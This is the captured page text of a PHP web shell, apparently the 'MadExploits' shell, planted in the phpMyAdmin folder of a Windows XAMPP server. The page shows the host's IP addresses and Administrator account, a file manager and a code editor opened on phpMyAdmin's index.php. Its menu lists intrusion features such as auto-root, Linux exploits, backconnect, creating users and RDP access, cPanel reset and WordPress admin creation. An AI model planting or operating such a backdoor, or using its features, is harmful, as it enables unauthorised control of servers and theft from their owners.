Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.15.198.120
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxrwxrwx
examples
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
libraries
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
setup
[ DIR ]
drwxrwxrwx
sql
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
themes
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.rtlcssrc.json
20
B
-rw-rw-rw-
CONTRIBUTING.md
2.53
KB
-rw-rw-rw-
ChangeLog
69.34
KB
-rw-rw-rw-
LICENSE
17.67
KB
-rw-rw-rw-
README
1.48
KB
-rw-rw-rw-
RELEASE-DATE-5.2.1
29
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
babel.config.json
69
B
-rw-rw-rw-
composer.json
5.2
KB
-rw-rw-rw-
composer.lock
298.68
KB
-rw-rw-rw-
config.inc.php
2
KB
-rw-rw-rw-
config.sample.inc.php
4.7
KB
-rw-rw-rw-
favicon.ico
21.96
KB
-rw-rw-rw-
index.php
1.05
KB
-rw-rw-rw-
package.json
2.72
KB
-rw-rw-rw-
robots.txt
26
B
-rw-rw-rw-
show_config_errors.php
1.13
KB
-rw-rw-rw-
url.php
965
B
-rw-rw-rw-
yarn.lock
247.17
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php declare(strict_types=1); use PhpMyAdmin\Common; use PhpMyAdmin\Routing; if (! defined('ROOT_PATH')) { // phpcs:disable PSR1.Files.SideEffects define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR); // phpcs:enable } if (PHP_VERSION_ID < 70205) { die('<p>PHP 7.2.5+ is required.</p><p>Currently installed version is: ' . PHP_VERSION . '</p>'); } // phpcs:disable PSR1.Files.SideEffects define('PHPMYADMIN', true); // phpcs:enable require_once ROOT_PATH . 'libraries/constants.php'; /** * Activate autoloader */ if (! @is_readable(AUTOLOAD_FILE)) { die( '<p>File <samp>' . AUTOLOAD_FILE . '</samp> missing or not readable.</p>' . '<p>Most likely you did not run Composer to ' . '<a href="https://docs.phpmyadmin.net/en/latest/setup.html#installing-from-git">' . 'install library files</a>.</p>' ); } require AUTOLOAD_FILE; global $route, $containerBuilder, $request; Common::run(); $dispatcher = Routing::getDispatcher(); Routing::callControllerForRoute($request, $route, $dispatcher, $containerBuilder);
Close